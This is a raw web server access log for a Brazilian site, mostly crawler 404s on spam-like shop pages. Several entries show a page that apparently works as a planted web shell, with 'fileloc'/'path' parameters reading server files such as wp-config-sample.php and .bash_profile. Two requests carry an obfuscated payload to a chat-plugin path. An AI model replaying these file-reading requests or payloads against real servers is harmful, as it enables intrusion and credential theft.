207.46.13.6 - - [28/Apr/2026:01:58:28 -0300] "GET /shop/clientele/frolicsomely011499186789.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.4 - - [28/Apr/2026:01:58:28 -0300] "GET /shop/anointing/fattened02709002561.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.243.44 - - [28/Apr/2026:01:58:28 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/public_html/wp-activate.php&path=/home/storage/f/44/55/novoprovisorio2/public_html HTTP/1.1" 200 20994 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
157.55.39.13 - - [28/Apr/2026:01:58:30 -0300] "GET /shop/ironwort/tangents063134485310.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.6 - - [28/Apr/2026:01:58:30 -0300] "GET /shop/glozing/addressing031243901932.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.4 - - [28/Apr/2026:01:58:30 -0300] "GET /shop/hawebake/ramean021004778820.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.243.3 - - [28/Apr/2026:01:58:30 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/public_html/wp-config-sample.php&path=/home/storage/f/44/55/novoprovisorio2/public_html HTTP/1.1" 200 16027 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
40.77.167.2 - - [28/Apr/2026:01:58:30 -0300] "GET /shop/shiite/audiovisual033061715422.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
167.58.18.113 - - [28/Apr/2026:01:58:30 -0300] "GET /schema/info/e1ypvzm8bjmwnw3.html HTTP/1.1" 200 50918 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4889.0 Safari/537.36"
74.7.241.2 - - [28/Apr/2026:01:58:31 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/.bash_profile&path=/home/storage/f/44/55/novoprovisorio2 HTTP/1.1" 404 13193 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
157.55.39.13 - - [28/Apr/2026:01:58:30 -0300] "GET /shop/struntian/polystomata431254958381.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.4 - - [28/Apr/2026:01:58:31 -0300] "GET /shop/subaerial/vehiculary022301268099.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.243 - - [28/Apr/2026:01:58:31 -0300] "GET /shop/ponderability/inaptly021810889464.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.242.170 - - [28/Apr/2026:01:58:31 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/public_html/wp-mail.php&path=/home/storage/f/44/55/novoprovisorio2/public_html HTTP/1.1" 200 21835 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
40.77.167.2 - - [28/Apr/2026:01:58:32 -0300] "GET /shop/theropoda/telemachus042506796264.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
179.188.53.154 - - [28/Apr/2026:01:53:33 -0300] "GET /wp-content/plugins/tawkto-live-chat/vendor/tawk/url-utils/lib/Helpers/Helpers/index.php?ARRAY=7o2230223n313737373335353631332p2231223n22687474703n5p2s5p2s6877623135377630392r6772616r646s2r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335323031332q6537333433313336633433633333626434373664373635636361316465393839222p2232223n223061646530306539363938336333343434633732376265643262613963646465222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231392q33372q36302q36392q37372q38352q3134227q HTTP/1.0" 504 247 "-" "-"
157.55.39.13 - - [28/Apr/2026:01:58:32 -0300] "GET /shop/subarachnoid/czarowitz053319504780.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.243 - - [28/Apr/2026:01:58:33 -0300] "GET /shop/moorband/awestricken03406908350.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.2 - - [28/Apr/2026:01:58:33 -0300] "GET /shop/spherobacterium/exsanguinity051064972297.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.243.57 - - [28/Apr/2026:01:58:33 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/public_html/wp-cron.php&path=/home/storage/f/44/55/novoprovisorio2/public_html HTTP/1.1" 200 17101 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
40.77.167.243 - - [28/Apr/2026:01:58:34 -0300] "GET /shop/excubation/lamdoidal041228975035.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.2 - - [28/Apr/2026:01:58:34 -0300] "GET /shop/amesace/stellation024018664409.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.4 - - [28/Apr/2026:01:58:34 -0300] "GET /shop/tamandua/hymnographer031464384282.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.241.2 - - [28/Apr/2026:01:58:35 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2/certificado2023 HTTP/1.1" 404 23126 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.242.140 - - [28/Apr/2026:01:58:35 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/public_html/wp-load.php&path=/home/storage/f/44/55/novoprovisorio2/public_html HTTP/1.1" 200 16551 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
40.77.167.243 - - [28/Apr/2026:01:58:35 -0300] "GET /shop/dumple/laveretus003596821089.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.2 - - [28/Apr/2026:01:58:36 -0300] "GET /shop/marlite/culter054055743789.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.143 - - [28/Apr/2026:01:58:36 -0300] "GET /shop/ballerus/monureide02138038092.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.4 - - [28/Apr/2026:01:58:36 -0300] "GET /shop/hydrobiplane/serilophus012065124247.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.242.140 - - [28/Apr/2026:01:58:37 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/public_html/wp-comments-post.php&path=/home/storage/f/44/55/novoprovisorio2/public_html HTTP/1.1" 200 15504 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
40.77.167.243 - - [28/Apr/2026:01:58:37 -0300] "GET /shop/baywinged/capriole02567808350.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.241.2 - - [28/Apr/2026:01:58:38 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2/.pki HTTP/1.1" 404 14853 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
40.77.167.143 - - [28/Apr/2026:01:58:38 -0300] "GET /shop/twinkled/noropianic002153616371.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.4 - - [28/Apr/2026:01:58:39 -0300] "GET /shop/piprine/stare022020899402.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.243.32 - - [28/Apr/2026:01:58:40 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/public_html/wp-signup.php&path=/home/storage/f/44/55/novoprovisorio2/public_html HTTP/1.1" 200 47325 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot"
40.77.167.2 - - [28/Apr/2026:01:58:40 -0300] "GET /shop/engendrure/malice032927539098.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
14.162.200.124 - - [28/Apr/2026:01:58:41 -0300] "GET /shop/hypotonic/movables40990650394.htm HTTP/1.1" 200 50918 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.40 Safari/537.36"
74.7.241.2 - - [28/Apr/2026:01:58:41 -0300] "GET /shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2/certificado HTTP/1.1" 404 23022 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
40.77.167.2 - - [28/Apr/2026:01:58:42 -0300] "GET /shop/dentist/pyramidoid012656942979.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.243 - - [28/Apr/2026:01:58:43 -0300] "GET /shop/pirating/collenchyma013987191524.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
14.187.103.219 14.187.103.219 - - [28/Apr/2026:01:58:43 -0300] "GET /shop/towned/nastiest422435439240.htm HTTP/1.1" 200 50918 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36"
52.167.144.159 - - [28/Apr/2026:01:58:43 -0300] "GET /shop/outstay/trellis00881240180.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.142 - - [28/Apr/2026:01:58:43 -0300] "GET /shop/ptolemaist/enrage023337221534.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.2 - - [28/Apr/2026:01:58:44 -0300] "GET /shop/objectoriented/private021198798384.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.243 - - [28/Apr/2026:01:58:44 -0300] "GET /shop/repletory/monopterygius042338792528.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.241.2 - - [28/Apr/2026:01:58:45 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=//null&path=/ HTTP/1.1" 404 12683 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm?path=/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
40.77.167.2 - - [28/Apr/2026:01:58:46 -0300] "GET /shop/groundsheet/conferential032083000757.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.6 - - [28/Apr/2026:01:58:46 -0300] "GET /shop/oxycymene/inventories032078909341.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.243 - - [28/Apr/2026:01:58:46 -0300] "GET /shop/besmeared/shern063566687662.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.2 - - [28/Apr/2026:01:58:47 -0300] "GET /shop/umpired/consarcination021290049966.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.241.2 - - [28/Apr/2026:01:58:48 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=//.rnd&path=/ HTTP/1.1" 404 12683 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm?path=/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
207.46.13.6 - - [28/Apr/2026:01:58:48 -0300] "GET /shop/fawkner/runnion043181828341.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.159 - - [28/Apr/2026:01:58:49 -0300] "GET /shop/goods/search.aspx?search=x&keyword=2026 HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
123.22.184.86 123.22.184.86 - - [28/Apr/2026:01:58:50 -0300] "GET /shop/indecorous/lodemanage48583151742.htm HTTP/1.1" 200 50918 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
207.46.13.6 - - [28/Apr/2026:01:58:50 -0300] "GET /shop/caloptenus/heterodoxy01152198638.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.159 - - [28/Apr/2026:01:58:50 -0300] "GET /shop/trawlboat/diuturnity051471347232.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.241.2 - - [28/Apr/2026:01:58:51 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/public_html/wp-includes/version.php&path=/home/storage/f/44/55/novoprovisorio2/public_html/wp-includes HTTP/1.1" 404 13967 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2/public_html/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
207.46.13.6 - - [28/Apr/2026:01:58:52 -0300] "GET /shop/ophrys/therefore033290803996.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.159 - - [28/Apr/2026:01:58:52 -0300] "GET /shop/arctiid/mobilization02535835808.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
179.188.53.154 - - [28/Apr/2026:01:53:54 -0300] "GET /wp-content/plugins/tawkto-live-chat/vendor/tawk/url-utils/lib/Helpers/Helpers/index.php?ARRAY=7o2230223n313737373335353633342p2231223n22687474703n5p2s5p2s6877623135377630392r6772616r646s2r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373335323033342q3863353130306563373134383462626537353664333964393630623136343337222p2232223n223061646530306539363938336333343434633732376265643262613963646465222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231392q33372q36302q36392q37372q38352q3134227q HTTP/1.0" 504 247 "-" "-"
52.167.144.159 - - [28/Apr/2026:01:58:53 -0300] "GET /shop/gondola/solfeggiare031030354302.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.6 - - [28/Apr/2026:01:58:53 -0300] "GET /shop/duller/huastorium022634464467.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.13 - - [28/Apr/2026:01:58:54 -0300] "GET /shop/bistipuled/newing041068840113.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.241.2 - - [28/Apr/2026:01:58:54 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=//.autorelabel&path=/ HTTP/1.1" 404 12691 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm?path=/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
52.167.144.159 - - [28/Apr/2026:01:58:54 -0300] "GET /shop/incloud/rakestale022033169232.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.142 - - [28/Apr/2026:01:58:56 -0300] "GET /shop/redrew/emblazoner061309921063.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
57.141.0.62 - - [28/Apr/2026:01:58:56 -0300] "GET /shop/bordered/reprovingly05781150605.htm HTTP/1.1" 404 50918 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.55.39.13 - - [28/Apr/2026:01:58:57 -0300] "GET /shop/promorphologist/noctambulo021733907116.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.241.2 - - [28/Apr/2026:01:58:57 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=//Linux-remover-falcon.sh&path=/ HTTP/1.1" 404 12702 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm?path=/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
52.167.144.142 - - [28/Apr/2026:01:58:57 -0300] "GET /shop/provost/palpless411737325676.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.142 - - [28/Apr/2026:01:58:59 -0300] "GET /shop/kabyles/current011870551587.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.241 - - [28/Apr/2026:01:58:59 -0300] "GET /shop/concubinal/carotid03554727596.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.142 - - [28/Apr/2026:01:58:59 -0300] "GET /shop/battledore/oxalamide023786858115.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.241.2 - - [28/Apr/2026:01:59:00 -0300] "GET /shop/munificence/vibriones02103874881.htm?fileloc=/home/storage/f/44/55/novoprovisorio2/public_html/wp-admin/ms-options.php&path=/home/storage/f/44/55/novoprovisorio2/public_html/wp-admin HTTP/1.1" 404 13418 "https://inovatapetes.com.br/shop/munificence/vibriones02103874881.htm?path=/home/storage/f/44/55/novoprovisorio2/public_html/wp-admin" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
52.167.144.142 - - [28/Apr/2026:01:59:01 -0300] "GET /shop/comprovincial/semicolon022040225337.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.142 - - [28/Apr/2026:01:59:02 -0300] "GET /shop/actinian/taxor062927298222.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
52.167.144.142 - - [28/Apr/2026:01:59:03 -0300] "GET /shop/props/perturbedly00203870121.htm HTTP/1.1" 404 50918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
